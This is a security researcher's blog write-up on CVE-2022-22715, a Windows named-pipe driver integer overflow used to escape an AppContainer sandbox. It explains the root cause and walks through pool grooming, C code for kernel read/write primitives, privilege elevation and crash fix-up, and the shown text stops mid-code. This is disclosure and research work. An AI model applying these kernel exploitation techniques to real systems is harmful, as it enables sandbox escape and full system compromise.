Normal view

There are new articles available, click to refresh the page.

Before yesterdayWHEREISK0SHL

WHEREISK0SHL
Break me out of sandbox in old pipe - CVE-2022-22715 Windows Dirty PipeWHEREISK0SHL
25 August 2022 at 03:09

Break me out of sandbox in old pipe - CVE-2022-22715 Windows Dirty Pipe

WHEREISK0SHL

By: WHEREISK0SHL

25 August 2022 at 03:09

Author: k0shl of Cyber Kunlun

In February 2022, Microsoft patched the vulnerability I used in TianfuCup 2021 for escaping Adobe Reader sandbox, assigned CVE-2022-22715. The vulnerability existed in Named Pipe File System nearly 10 years since the AppContainer was born. We called it "Windows Dirty Pipe".

In this article, I will share the root cause and exploitation of Windows Dirty Pipe. So let's start our journey.

Background

Named pipe is a named, one-way or duplex pipe for communication between the pipe server and one or more pipe clients. Many browsers and applications use Named Pipe as IPC between browser process and render process. And AppContainer was introduced when Microsoft released Windows 8.1 as a sandbox mechanism to isolate resources access from UWP application.

Since then, some browsers and applications such as old edge or Adobe Reader use AppContainer as their render process sandbox, and of course, the Named Pipe File System added some mechanisms for AppContainer support. As result, it brought Windows Dirty Pipe -- CVE-2022-22715

Root Cause of Windows Dirty Pipe

The vulnerability existed in Named Pipe File System Driver - npfs.sys, and the issue function is npfs!NpTranslateContainerLocalAlias. When we invoking NtCreateFile with a named pipe path, it will hit the IRP_MJ_CREATE major function of npfs, it called NpFsdCreate.

__int64 __fastcall NpFsdCreate(__int64 a1, _IRP *a2)
{
  [...]
  if ( RelatedFileObject )
  {
     [...]
  }
  if ( UnicodeString.Length )
  {
    if ( UnicodeString.Length == 2 && *UnicodeString.Buffer == 0x5C && !RelatedFileObject ) // ===> if open root directory
      goto LABEL_47;
  }
  else
  {
    if ( !RelatedFileObject || NamedPipeType == 0x201 )
    {
      [...]
    }
    if ( NamedPipeType == 0x206 )
    {
      LABEL_47:
      *(_OWORD *)&a2->IoStatus.Status = *(_OWORD *)NpOpenNamedPipeRootDirectory( // ===> open root directory
                                                     (__int64)&MasterIrp,
                                                     v3,
                                                     (__int64)FileObject);
      [...]
    }
  }
  if ( ifopenflag )
  {
    if ( !RelatedFileObject )
    {
      if ( createdisposition == 1 )
      {
        *(_OWORD *)&a2->IoStatus.Status = *(_OWORD *)NpOpenNamedPipePrefix(  // ====> open a existed directory named pipe
                                                       (__int64)v33,
                                                       v3,
                                                       FileObject,
                                                       v11,
                                                       DesiredAccess,
                                                       RequestorMode);
        [...]
      }
      if ( (unsigned int)(createdisposition - 2) <= 1 )
      {
        *(_OWORD *)&a2->IoStatus.Status = *(_OWORD *)NpCreateNamedPipePrefix(  // ====> create a new directory named pipe
                                                       (__int64)v34,
                                                       v3,
                                                       FileObject,
                                                       (struct _SECURITY_SUBJECT_CONTEXT *)v11,
                                                       DesiredAccess,
                                                       RequestorMode,
                                                       Options_high);
        [...]
      }
    }
    goto LABEL_57;
  }
  [...]
  Status = NpTranslateAlias((__m128i *)&namedpipename, ClientToken, &v39); // =====> create a new pipe
  [...]
}

The function dispatch into different handler function, it depends on the parameters of NtCreateFile, such as RootDirectory of ObjectAttributes or CreateDisposition. And if we create a new named pipe, it will come into NpTranslatedAlias.

NTSTATUS __fastcall NpTranslateAlias(UNICODE_STRING *namedpipename, void *a2, _DWORD *a3)
{
  [...]
  *(_QWORD *)&String1.Length = 0xE000Ci64;
  String1.Buffer = L"LOCAL\\";
  DestinationString = 0i64;
  *a3 = 0;
  Length = _mm_cvtsi128_si32(*(__m128i *)a1);
  String2 = *a1;
  String2.Length = Length;
  if ( Length >= 2u && *String2.Buffer == 0x5C )
  {
    Length -= 2;
    String2.MaximumLength -= 2;
    v7 = 1;
    ++String2.Buffer;
    String2.Length = Length;
  }
  else
  {
    v7 = 0;
  }
  if ( !Length )
    return 0;
  if ( a2 && Length > 0xCu )
  {
    if ( RtlPrefixUnicodeString(&String1, &String2, 1u) ) // ====> compare "LOCAL\\" and prefix of named pipe name
      return NpTranslateContainerLocalAlias(a1, a2, a3); // =====> vulnerable code
  [...]
}

The named pipe name which can be controlled by us will pass into NpTranslateAlias, the function will get the prefix of the named pipe name and compare it with "LOCAL\", if our named pipe name use "LOCAL\" as the prefix, this will hit the NpTranslateContainerLocalAlias function. It means we can use "\Device\NamedPipe\LOCAL\xxxxx" as the named pipe name.

Finally, we hit the vulnerable function, it's time to show root cause.

NTSTATUS __fastcall NpTranslateContainerLocalAlias(struct _UNICODE_STRING *namedpipename, void *a2, _DWORD *a3)
{
  [...]
  result = SeQueryInformationToken(a2, TokenIsAppContainer, &TokenInformation);
  if ( result >= 0 )
  {
    result = SeQueryInformationToken(a2, TokenIsRestricted|TokenGroups, &v28);
    if ( result >= 0 )
    {
      if ( !TokenInformation && !v28 ) // =====> token must be appcontainer or restricted
        return 0;
  [...]
  v14 = *namedpipename;
  *(_QWORD *)&v30 = *(_QWORD *)&namedpipename->Length;
  v15 = v30;
  v16 = (_WORD *)_mm_srli_si128((__m128i)v14, 8).m128i_u64[0];
  v17 = v16;
  *((_QWORD *)&v30 + 1) = v16;
  if ( *v16 == '\\' ) 
  {
    v17 = v16 + 1;
    ifslash = 1; // ====> if there is "\\" in named pipe name, ifslash will set to 1
    v15 = v30 - 2;
  }
  else
  {
    ifslash = 0;
  }
  [...] // ====> calculate the new prefix length
  v21 = prefixlength + namedpipenamelength + 0x14; 
  v26.MaximumLength = v21;
  if ( ifslash )
  {
    v21 += 2; // ===> variable v21 is ushort type, it will be add to 0
    v26.MaximumLength = v21;
  }
  PoolWithTag = (WCHAR *)ExAllocatePoolWithTag(PagedPool, v21, 0x6E46704Eu); // ====> v21 will be 0 because of integer overflow, and it will allocate a small pool.
  v26.Buffer = PoolWithTag;
  if ( PoolWithTag )
  {
    if ( ifslash )
    {
      v26.Buffer = PoolWithTag + 1;
      v26.MaximumLength -= 2; // if ifslash is 1, length 0 minus 2, it will cause integer underflow and the length will be set to 0xfffe
    }
    [...]
    RtlUnicodeStringPrintf(  // ====> RtlUnicodeStringPrintf will copy large size(0xfffe) buffer to a small pool cause out of bound write
      &v26,
      L"Sessions\\%ld\\AppContainerNamedObjects\\%wZ\\%wZ\\%wZ",
      (unsigned int)v32,
      &v35,
      &DestinationString,
      &v30);
    [...]
  }
  [...]
}

First, npfs check the process token privilege if it's appcontianer or restricted, it must meet one of two conditions at least which means the process must be a appcontainer, a restricted sandboxed process or both. And then, function check the named pipe name if the first wchar is "\", if so, npfs set variable |ifslash| to 1. After that, it calculate a new named pipe prefix length, the new named pipe prefix include SID, session number, specify string and etc., finally the new prefix length add named pipe name length and 0x14, and if variable |ifslash| is 1, the total size will add 2 to the final size.

Note that all the variable is ushort type, so there is a obviously integer overflow, if we use a long length named pipe name, the total size will be a small value finally.

After calculation, npfs allocate a small pool because of the small total size, then if |ifslash| is 1, the total size minus 2, if the total size is 0, there is a integer underflow, and the maxiumlength of unicode string will be a large ushort value 0xfffe.

The function RtlUnciodeStringPrintf will copy a string into the new pool buffer, the length of memcpy depends on maxiumlength of unicode string, if we trigger integer underflow before, npfs will copy a large value to a small pool trigger out of bound write.

Crash Dump:

rax=0000000000000000 rbx=ffffe7862a687118 rcx=ffffe7862a687080
rdx=4141414141414141 rsi=4141414141414141 rdi=ffffe7862a6876d0
rip=fffff80313807bc8 rsp=ffffe40ab22d8420 rbp=ffffe7862a4e6820
 r8=ffffe40ab22d8470  r9=000001c7aa2763c0 r10=fffff80313807ac0
r11=ffffe7862a687080 r12=0000000000000001 r13=0000000000000001
r14=ffffe78628cbc060 r15=0000000000000000
iopl=0         nv up ei pl zr na po nc
cs=0010  ss=0018  ds=002b  es=002b  fs=0053  gs=002b             efl=00050246
nt!ExAcquirePushLockExclusiveEx+0x108:
fffff803`13807bc8 f0480fba2e00    lock bts qword ptr [rsi],0 ds:002b:41414141`41414141=????????????????

The crash dump shows the out of bound write corrupt some other objects after the 0x20 pool.

The purpose of NpTranslateContainerLocalAlias function is to translate the named pipe name including "LOCAL\" to a new named pipe name. For example, if the process is an appcontainer sandboxed process, it translates the name pipe name to a format string with "AppContainerNamedObjects", AppContainerNamedObjects is a directory which store some appcontainer related objects in object manager. Npfs finally create a new named pipe object under AppContainerNamedObjects directory in object manager.

But all the size variables type is ushort, this is the root cause of Windows Dirty Pipe.

Challenges of Windows Dirty Pipe

After introducing the root cause of Windows Dirty Pipe, I want to share the challenges of the CVE-2022-22715 before I public my exploitation.

When I trigger the crash and confirm the vulnerability, I quickly realize that the vulnerability is not easy to exploit, there is some challenges I will meet when I do exploit.

Although integer overflow when npfs calculate the total size could make total size to a small value, such as 0x20\0x30\0x40..., but it must be 0, because we need trigger integer underflow to make maxiumlength of unicode string to a large ushort value for out of bound writing, if we set the total size to larger than 0, after total size minus 2, it's still a small value and out of bound write will not triggered.
As I said above, the memcpy length is 0xfffe, it means I need to copy a more than 16 pages pool memory to a paged pool segment, this is not easy to make a stable layout.

An interesting kernel pool allocation mechanism

The first step of my exploitation is try to find a way to complete pool feng shui. In this situation, the corrupted pool must be a 0x20 paged pool, it's a kernel low fragmentation heap(LFH) pool, at first, I want to spray 0x20 LFH pools, and corrupt some 0x20 object to complete exploitation.

But there is a problem that I can't control the vulnerable 0x20 pool position in LFH bucket precisely and the memcpy length is 0xfffe, this may corrupt some unexpected objects or protected pages which cause BSoD.

I don't want to introduce kernel pool allocation deeply in my blog, there are many awesome articles/slides about it. Now let me share an interestring kernel pool allocation mechanism I used when I try to solve the problem.

As we all know, Windows kernel allocate pool segment by backend allocator and allocate subsegment by frontend allocator, and an interestring mechanism is that different type of subsegment can be allocate in the same segment.

That get my attention!

After some tests, I confirm that I can make a 0x20 LFH subsegment and a VS subsegment adjacent. This make my pool feng shui layout.

Stage 1: Preparation

Because vulnerable pool is a paged pool, so I choose WNF as my limited r/w primitive. I use _WNF_STATE_DATA as a limited out of bound read/write object -- the manager object, the maxium read/write range of _WNF_STATE_DATA is 0x1000. And I need to find another object to complete arbitrary address read/write -- the worker object. Actually, it's not difficult to find a suitable object, the object must be a paged pool object including a pointer field that could be used to read/write arbitrary address such as through memcpy.

I finally decided to use _TOKEN object as the worker object, if I invoke NtSetInformationToken with TokenDefaultDacl TokenInformationClass, nt finally invoke nt!SepAppendDefaultDacl copy a user-controlled content to a pointer field store in _TOKEN object.

void *__fastcall SepAppendDefaultDacl(_TOKEN *TOKEN, unsigned __int16 *usercontrolled)
{
  v3 = usercontrolled[1];
  v4 = (_ACL *)&TOKEN->DynamicPart[*((unsigned __int8 *)a1->PrimaryGroup + 1) + 2];
  result = memmove(v4, usercontrolled, usercontrolled[1]);
  [...]
}

And if I invoke NtQueryInformationToken with TokenBnoIsolation TokenInformationClass, nt copy a isolationprefix buffer to usermode memory.

NTSTATUS __stdcall NtQueryInformationToken(
        HANDLE TokenHandle,
        TOKEN_INFORMATION_CLASS TokenInformationClass,
        PVOID TokenInformation,
        ULONG TokenInformationLength,
        PULONG ReturnLength)
{
  [...]
      case TokenBnoIsolation:
          [...]
          memmove(
            (char *)TokenInformation + 16,
            TOKEN->BnoIsolationHandlesEntry->EntryDescriptor.IsolationPrefix.Buffer,
            TOEKN->BnoIsolationHandlesEntry->EntryDescriptor.IsolationPrefix.MaximumLength);
        }
  [...]
}

So I could use manager object to construct a fake _TOKEN object structure to modify the adjacent worker object, then use NtSetInformationToken and NtQueryInformationToken as arbitrary r/w primitive.

Another object I need to prepare is the 0x20 spray object, it should be full controlled by me including allocate and free. I find there is a function named nt!NtRegisterThreadTerminatePort.

NTSTATUS __fastcall NtRegisterThreadTerminatePort(void *a1)
{
  CurrentThread = KeGetCurrentThread();
  Object = 0i64;
  result = ObReferenceObjectByHandle(a1, 1u, LpcPortObjectType, CurrentThread->PreviousMode, &Object, 0i64);
  if ( result >= 0 )
  {
    PoolWithQuotaTag = ExAllocatePoolWithQuotaTag((POOL_TYPE)9, 0x10ui64, 0x70547350u);
    v4 = PoolWithQuotaTag;
    if ( PoolWithQuotaTag )
    {
      PoolWithQuotaTag[1] = Object;
      *PoolWithQuotaTag = CurrentThread[1].InitialStack;
      result = 0;
      CurrentThread[1].InitialStack = v4;
    }
    else
    {
      ObfDereferenceObject(Object);
      return -1073741670;
    }
  }
  return result;
}

Function reference a LpcPort object and allocate a 0x20 paged pool for storing the LpcPort object, then store it into _ETHREAD object. If we create a thread and invoke NtRegisterThreadTerminatePort multiple times in thread, it could allocate a large amount of 0x20 paged pool.

Finally there was a pool feng shui plan in my head:

Spray 0x20 paged pool to fill LFH subsegment, if all segment is full, backend allocation will allocate a new segment, and our new 0x20 LFH subsegment will be located in new segment.
Spray _TOKEN object and _WNF_STATE_DATA object to fill VS subsegment, make sure they are in same page, and frontend allocation will finally allocate new VS subsegement, it will be located in the segement which created in step 1, adjacent to the LFH subsegment.

So our finally pool feng shui just like following:

Note that I can't predict the vulnerable pool's position in LFH Bucket, but actually I don't care about it, in this pool feng shui situation, the target of out of bound write is occupy the manager object and the worker object in VS subsegment, so I don't need to make pool hole for vulnerable object, just fill the LFH bucket with spray object, and make sure the vulnerable object located at the end LFH bucket.

Stage 2: Pool feng shui

When spraying WNF object, I find out that there is another object named _WNF_NAME_INSTANCES be created, it will cause frontend allocation create another LFH segment and affect our pool feng shui layout.

So before I do pool feng shui, I create a lot of 0xd0 pool and free them to make a large amount of 0xd0 pool hole to store _WNF_NAME_INSTANCES objects.

for (UINT i = 0x0; i < 0x4000; i++) {//0xf000 for normal pool hole
        AllocateWnfObject(0xd0, &gStateName[i]);
}
for (UINT i = 0x0; i < 0x4000; i++) {//0xf000
        fNtDeleteWnfStateName(&gStateName[i]);//0x30
}

I allocate a lot amount of spray objects and spray _TOKEN objects and _WNF_STATE_DATA objects first, it will create new LFH subsegment and VS subsegement in the new segment. We can observe the final pool feng shui layout by windbg.

0: kd> !pool ffffb0880d69e000
Pool page ffffb0880d69e000 region is Paged pool
*ffffb0880d69e000 size:   20 previous size:    0  (Allocated) *PsTp Process: ffffc10b74a1c080
        Pooltag PsTp : Thread termination port block, Binary : nt!ps
 ffffb0880d69e020 size:   20 previous size:    0  (Allocated)  PsTp Process: ffffc10b74a1c080
 ffffb0880d69e040 size:   20 previous size:    0  (Allocated)  PsTp Process: ffffc10b74a1c080
 ffffb0880d69e060 size:   20 previous size:    0  (Allocated)  PsTp Process: ffffc10b74a1c080
 ffffb0880d69e080 size:   20 previous size:    0  (Allocated)  PsTp Process: ffffc10b74a1c080
 ffffb0880d69e0a0 size:   20 previous size:    0  (Allocated)  PsTp Process: ffffc10b74a1c080
 
0: kd> !pool ffffb0880d69f000
Pool page ffffb0880d69f000 region is Paged pool
*ffffb0880d69f000 size:   20 previous size:    0  (Free)      *....
        Owning component : Unknown (update pooltag.txt)
 ffffb0880d69f020 size:   20 previous size:    0  (Free)       ....
 ffffb0880d69f040 size:   20 previous size:    0  (Free)       ....
 ffffb0880d69f060 size:   20 previous size:    0  (Free)       ....
 ffffb0880d69f080 size:   20 previous size:    0  (Free)       ....
 ffffb0880d69f0a0 size:   20 previous size:    0  (Free)       ....
 
0: kd> !pool ffffb0880d6a0000
Pool page ffffb0880d6a0000 region is Paged pool
*ffffb0880d6a0000 size:   20 previous size:    0  (Free)      *....
        Owning component : Unknown (update pooltag.txt)
 ffffb0880d6a0020 size:   20 previous size:    0  (Free)       ....
 ffffb0880d6a0040 size:   20 previous size:    0  (Free)       ....
 ffffb0880d6a0060 size:   20 previous size:    0  (Free)       ....
 ffffb0880d6a0080 size:   20 previous size:    0  (Free)       ....

0: kd> !pool ffffb0880d6a1000
Pool page ffffb0880d6a1000 region is Paged pool
*ffffb0880d6a1000 size:   20 previous size:    0  (Free)      *....
        Owning component : Unknown (update pooltag.txt)
 ffffb0880d6a1020 size:   20 previous size:    0  (Free)       ....
 ffffb0880d6a1040 size:   20 previous size:    0  (Free)       ....
 ffffb0880d6a1060 size:   20 previous size:    0  (Free)       ....
 ffffb0880d6a1080 size:   20 previous size:    0  (Free)       ....
 
0: kd> !pool ffffb0880d6a2000  // ======>  new VS subsegment header
Pool page ffffb0880d6a2000 region is Paged pool
*ffffb0880d6a2000 size:   30 previous size:    0  (Free)      *....
        Owning component : Unknown (update pooltag.txt)
 ffffb0880d6a2040 size:  880 previous size:    0  (Allocated)  Toke
 ffffb0880d6a28d0 size:  580 previous size:    0  (Allocated)  Wnf  Process: ffffc10b74a1c080
 ffffb0880d6a2e50 size:  190 previous size:    0  (Free)       ..D.

As the layout show, there are many free LFH pool holes in the end LFH bucket, and the new VS subsegment is next to the LFH bucket, if we create vulnerable object now, it will be located in one of the free LFH pool hole.

Note the vulnerable object may not located in the last LFH page, but it's not necessary, the out of bound write may corrupt the LFH bucket will not affect our exploitation.

0: kd> r
rax=ffffb0880d69e750 rbx=0000000000000002 rcx=0000000000000028
rdx=0000000000000000 rsi=0000000000000000 rdi=ffffe4835a302301
rip=fffff800401c2b31 rsp=ffffe4835a301e00 rbp=ffffe4835a301f00
 r8=0000000000000fff  r9=00000000000004ca r10=000000006e46704e
r11=0000000000001001 r12=ffffe4835a302220 r13=ffffe4835a302310
r14=0000000000000001 r15=000000000000ff01
iopl=0         nv up ei ng nz na pe nc
cs=0010  ss=0018  ds=002b  es=002b  fs=0053  gs=002b             efl=00040282
Npfs!NpTranslateContainerLocalAlias+0x391:
fffff800`401c2b31 4889442450      mov     qword ptr [rsp+50h],rax ss:0018:ffffe483`5a301e50=0000000000000000

0: kd> !pool @rax // ===> vulnerable pool locate at one of free hole in LFH bucket
Pool page ffffb0880d69e750 region is Paged pool
 ffffb0880d69e700 size:   20 previous size:    0  (Allocated)  PsTp Process: ffffc10b74a1c080
 ffffb0880d69e720 size:   20 previous size:    0  (Allocated)  PsTp Process: ffffc10b74a1c080
*ffffb0880d69e740 size:   20 previous size:    0  (Allocated) *NpFn
        Pooltag NpFn : Name block, Binary : npfs.sys
 ffffb0880d69e760 size:   20 previous size:    0  (Allocated)  PsTp Process: ffffc10b74a1c080
 ffffb0880d69e780 size:   20 previous size:    0  (Allocated)  PsTp Process: ffffc10b74a1c080
 ffffb0880d69e7a0 size:   20 previous size:    0  (Allocated)  PsTp Process: ffffc10b74a1c080
 ffffb0880d69e7c0 size:   20 previous size:    0  (Allocated)  PsTp Process: ffffc10b74a1c080
 ffffb0880d69e7e0 size:   20 previous size:    0  (Allocated)  PsTp Process: ffffc10b74a1c080
 ffffb0880d69e800 size:   20 previous size:    0  (Allocated)  PsTp Process: ffffc10b74a1c080
 ffffb0880d69e820 size:   20 previous size:    0  (Allocated)  PsTp Process: ffffc10b74a1c080
 ffffb0880d69e840 size:   20 previous size:    0  (Free)       MPCt
 ffffb0880d69e860 size:   20 previous size:    0  (Free)       MPCt
 ffffb0880d69e880 size:   20 previous size:    0  (Allocated)  PsTp Process: ffffc10b74a1c080
 ffffb0880d69e8a0 size:   20 previous size:    0  (Allocated)  PsTp Process: ffffc10b74a1c080
 ffffb0880d69e8c0 size:   20 previous size:    0  (Free)       MPCt
 ffffb0880d69e8e0 size:   20 previous size:    0  (Allocated)  PsTp Process: ffffc10b74a1c080

Then after invoking RtlUnicodeStringPrintf function, it will out of bound write about 0xfffe memory size content, this corrupt the LFH pool space and VS pool space. And the corrupt data is named pipe name that we could control, we need calculate the malicious payload for modifing the _WNF_STAT_DATA->DataSize.

When we create _WNF_STATE_DATA, we can't set DataSize larger than _WNF_STATE_DATA data region, but after triggerring vulnerability, we could modify it to any value, the maxium value of DataSize is 0x1000, we could gain a limited out of bound r/w primitive to modify the _TOKEN object in next page.

0: kd> dq ffffb0880d6a28d0 l4
ffffb088`0d6a28d0  00001000`00001000 00001000`00001000
ffffb088`0d6a28e0  00001000`00001000 00001000`00001000

Stage 3: Gain arbitrary address r/w

In stage 2, we make a pool feng shui, and gain a limited r/w primitive with _WNF_STATE_DATA object, but there is a huge problem. How I find which object handle I need to use?

If I corrupt the object and use it by handle, the corrupted object header data will crash the system. And now, I need to find out a useful manager object(_WNF_STAT_DATA) name and worker object(_TOKEN) handle.

I thought of a solution. For manager object, when we try to read data from _WNF_STATE_DATA data region, we call NtQueryWnfStateData with a specified length, if the length is larger than DataSize, it will return nt error code 0xc0000023. For worker object, when we create a _TOKEN object, there is a unique LUID in _TOKEN object, and it could be queried by NtQueryInformationToken with TokenStatics TokenInformationClass, it named TokenId, we could query them when we spray _TOKEN Object and store it in an array.

Because _WNF_NAME_INSTANCES will not be corrupted, we can use NtUpdateWnfStateData and NtQueryWnfStateData normally.

I have already corrupt some _WNF_STATE_DATA objects in stage 2, and modify DataSize to 0x1000, we could use NtQueryWnfStateData with 0x1000 length parameter to find out the corrupted _WNF_STATE_DATA object, and read out of bound data to find the last corrupted page, the normal page adjacent to corrupted page.

Reading out of bound data will not corrupt the object structure, so we can use NtQueryWnfStateData with 0x1000 length parameter, if _WNF_STATE_DATA object isn't corrupted, it will return 0xC0000023, and if it is, it will return the out of bound data.

If the out of bound data is the malicious data, I can make sure the _WNF_STATA_DATA is not in the last corrupted page, I use this way to find out the last corrupted page so I can read the next normal page with _TOKEN object structure. The _WNF_STATE_DATA object in the last corrupted page is our manager object.

There is a LUID field in _TOKEN object, we gain it from out of bound read data, and match this LUID in array we created before, so that we finally find the worker object.

0: kd> dq 0xffffb0880d6ae000 // ===>  the last corrupted page
ffffb088`0d6ae000  00010001`00010001 00010001`00010001
ffffb088`0d6ae010  00010001`00010001 00010001`00010001
ffffb088`0d6ae020  00010001`00010001 00010001`00010001
ffffb088`0d6ae030  00010001`00010001 00010001`00010001
0: kd> dq 0xffffb0880d6af000 // ===> the first normal page
ffffb088`0d6af000  656b6f54`03880000 00000000`00000000
ffffb088`0d6af010  000007b8`00001000 00000000`00000108
ffffb088`0d6af020  ffffc10b`775e8b80 00000000`00000000
ffffb088`0d6af030  00000000`00008000 00000000`00000001
ffffb088`0d6af040  00000000`00000000 00000000`0008006d

So far, I get the manager object name and worker object handle, then I construct a 0x1000 fake data include fake _TOKEN Object structure and a _WNF_STATE_DATA structure. I have already got the normal _TOKEN object structure content by invoking NtQueryWnfStateData before, I just need to change some value to gain arbitrary r/w primitive.

Read Primitive:

    FakeSepCached = malloc(0x48);
    ZeroMemory(FakeSepCached, 0x48);
    *(USHORT*)((ULONG_PTR)FakeSepCached + 0x2A) = 0x8;
    *(UINT64*)((ULONG_PTR)FakeSepCached + 0x30) = ReadAddress;

    CorruptionData = malloc(OriginalSize);
    ZeroMemory(CorruptionData, OriginalSize);
    CopyMemory(CorruptionData, gOccupyWorkerToken, OriginalSize);

    *(PUINT64)((UINT64)CorruptionData + TokenOffset + 0x480) = (UINT64)FakeSepCached;
    *(PUINT64)((UINT64)CorruptionData + TokenOffset - 0x30) = (UINT64)3;

    Status = fNtUpdateWnfStateData(&gWorkerStateName, CorruptionData, OriginalSize, &TypeID, NULL, NULL, NULL); // ===> control manager object
    if (Status < 0) {
        free(CorruptionData);
        free(FakeSepCached);
        return FALSE;
    }
  // ===>  arbitrary read
    Status = fNtQueryInformationToken(
        TokenHandle,
        TokenBnoIsolation,
        &RecvBuffer,
        RecvBufferSize,
        &RecvBufferSize);

Write Primitive:

  CorruptionData = (PCHAR)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, OriginalSize);
    CopyMemory(CorruptionData, gOccupyWorkerToken, OriginalSize);

    *(PUINT64)(CorruptionData + TokenOffset - 0x30) = 2;
    *(PUINT64)(CorruptionData + TokenOffset + 0x8c) = 0x10000;

    *(PUINT64)(CorruptionData + TokenOffset + 0xa8) = (UINT64)pETHREAD + 0x1f0;
    *(PUINT64)(CorruptionData + TokenOffset + 0xb0) = (UINT64)pETHREAD + 0x1e8;
    *(PUINT64)(CorruptionData + TokenOffset + 0xb8) = (UINT64)0;
    fNtUpdateWnfStateData(&gWorkerStateName, CorruptionData, OriginalSize, &TypeID, NULL, NULL, NULL);// ===> control manager object

    pACL = (PACL)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, 0x48);
    pACL->AclRevision = 2;
    pACL->AceCount = 1;
    pACL->AclSize = 0x48;

    pACE = (PACE_HEADER)(pACL + 1);
    pACE->AceSize = 0x48 - sizeof(ACL);
    pACE->AceType = 50;
    *(PUINT64)((ULONG_PTR)pACL + 0x18) = (UINT64)pQueueListEntryFlink;
    *(PUINT64)((ULONG_PTR)pACL + 0x20) = (UINT64)pQueueListEntryBlink;
    *(PUINT64)((ULONG_PTR)pACL + 0x28) = (UINT64)pNextProcessor;
    *(PUINT64)((ULONG_PTR)pACL + 0x30) = (UINT64)pProcess;
    *(PUINT64)((ULONG_PTR)pACL + 0x38) = 0x3;
    *(PUINT64)((ULONG_PTR)pACL + 0x40) = 0x0100000008000000;
  // ===>  arbitrary write
    Status = fNtSetInformationToken(
        TokenHandle,
        TokenDefaultDacl,
        &pACL,
        8);

Stage 4: Elevation of privilege and Fix up

We gain arbitrary address r/w primitive, at first, I just want to replace the process TOKEN to system, it succeed, but after while, I find it's easy to crash. For example, I corrupt some _TOKEN objects, if I open processexplorer, it will travesal user space handle table for every process, it will cause crash when processexplorer access the exploite process handle table.

I need to fix up after exploit, so I decide not replace the process TOKEN, and just modify the _ETHREAD->PreviousMode, if I set previous mode to 0, I inovke NT API such as NtReadVirtualMemory and NtWriteVirtualMemory, kernel will think the thread is running in kernel mode. This is a common technology to elevate privilege, it's convenient to me for elevating of privilege and fixing instead of construct fake object every time.

Finally I use worker object to set _ETHREAD->PreviousMode to 0, and then use NtReadVirtualMemory/NtWriteVirtuaMemory to do elevation of privilege and fix up.

There are some thing we need to do when fixing.

1.Corrupted _Token Object.

I trigger corrupted object crash and realize that it crash because I corrupt the ObjectType in ObjectHeader, so when the nt reference the object, it will crash the system. And I can get the cookie in nt data section and calculate the objecttype in object header. I fix every corrupted _TOKEN object header.

    UINT64 pObjHeaderCookie = ntaddr + OBJHEADERCOOKIE;
    BYTE cookie;
    X64Call(pReadVirtualMemory, 5, (UINT64)GetCurrentProcess(), (UINT64)pObjHeaderCookie, (UINT64)&cookie, (UINT64)sizeof(BYTE), (UINT64)&dwByte);
    BYTE addrbyte = (pPoolAddress >> 8) & 0xff;
    BYTE offset = cookie ^ addrbyte ^ TokenTypeIndex;
    BYTE bModifiedType;
    for (UINT i = typeindex; i <= modifiedindex; i++) {
        bModifiedType = offset ^ cookie ^ (((pPoolAddress - i * 0x1000) >> 8) & 0xff);
        X64Call(pWriteVirtualMemory, 5, (UINT64)GetCurrentProcess(), (UINT64)((UINT64)pPoolAddress - i * 0x1000 + 0x88), (UINT64)&bModifiedType, (UINT64)sizeof(BYTE), (UINT64)&dwByte);
        X64Call(pWriteVirtualMemory, 5, (UINT64)GetCurrentProcess(), (UINT64)((UINT64)pPoolAddress - i * 0x1000 + 0x48), (UINT64)&bModifiedType, (UINT64)sizeof(BYTE), (UINT64)&dwByte);
    }

2.Corrupted VS pool structure.

This is the most complicate problem I meet, I do not only corrupt the object structure, but also corrupt the VS pool structure, this will cause BSoD unexpected. I do some reversing in VS allocation deeply and find there is a RBTree to manage VS pool, if I know a VS pool address, I can calculate the VS pool manager address.

When a new VS pool allocate or a old free, it will travesal the RBTree from the VS pool manager, and if I corrupt the VS pool address which means when VS pool manager travesal from the root node and access the corrupted node, it will crash.

So I need to find the crash node from the RBTree root node, and delete it from RBTree, this may cause some memory leak if there are some other VS pools under the corrupted node, but it's better than crash the system.

I calculate the root VS pool, travesal the RBTree and delete the node from the RBTree.

  UINT64 zeroSet = 0x0;
    UINT64 ntaddr = KernelSymbolInfo();
    UINT64 pGlobalHeapAddr = ntaddr + GLOBALOFFSET;
    UINT64 pGlobalHeapValue;
    UINT64 pPoolChunkAddr = pPoolAddress & 0xfffffffffff00000;
    UINT64 pPoolChunkValue;
    X64Call(pReadVirtualMemory, 5 , (UINT64)GetCurrentProcess(), (UINT64)pGlobalHeapAddr, (UINT64)&pGlobalHeapValue, (UINT64)sizeof(UINT64), (UINT64)&dwByte);
    X64Call(pReadVirtualMemory, 5, (UINT64)GetCurrentProcess(), (UINT64)pPoolChunkAddr + 0x10, (UINT64)&pPoolChunkValue, (UINT64)sizeof(UINT64), (UINT64)&dwByte);
    UINT64 pHpMgrAddr = ((UINT64)pGlobalHeapValue ^ (UINT64)pPoolChunkAddr ^ (UINT64)pPoolChunkValue ^ 0xA2E64EADA2E64EAD) - 0x100 + 0x290; // ======> calculate the VS pool manager address
    UINT64 pRootChunkAddr;
    UINT64 pRightChunk;
    UINT64 pLeftChunk;
    X64Call(pReadVirtualMemory, 5, (UINT64)GetCurrentProcess(), (UINT64)pHpMgrAddr, (UINT64)&pRootChunkAddr, (UINT64)sizeof(UINT64), (UINT64)&dwByte);
    X64Call(pReadVirtualMemory, 5, (UINT64)GetCurrentProcess(), (UINT64)pRootChunkAddr, (UINT64)&pLeftChunk, (UINT64)sizeof(UINT64), (UINT64)&dwByte);
    X64Call(pReadVirtualMemory, 5, (UINT64)GetCurrentProcess(), (UINT64)pRootChunkAddr + 0x8, (UINT64)&pRightChunk, (UINT64)sizeof(UINT64), (UINT64)&dwByte); // ====> get the root VS pool address
    UINT64 pTargetChunk = pPoolAddress & 0xffffffffffff0000;
    UINT64 pFinalChunk = NULL;
    UINT64 pTempLeftChunk = pLeftChunk, pTempRightChunk = pRightChunk;
    UINT64 pTempRootChunk;
    pRootChunkAddr = pLeftChunk; // ====> traversal from left chunk
    while (pLeftChunk != 0 && pRightChunk != 0) {
        X64Call(pReadVirtualMemory, 5, (UINT64)GetCurrentProcess(), (UINT64)pRootChunkAddr, (UINT64)&pLeftChunk, (UINT64)sizeof(UINT64), (UINT64)&dwByte);
        X64Call(pReadVirtualMemory, 5, (UINT64)GetCurrentProcess(), (UINT64)pRootChunkAddr + 0x8, (UINT64)&pRightChunk, (UINT64)sizeof(UINT64), (UINT64)&dwByte);
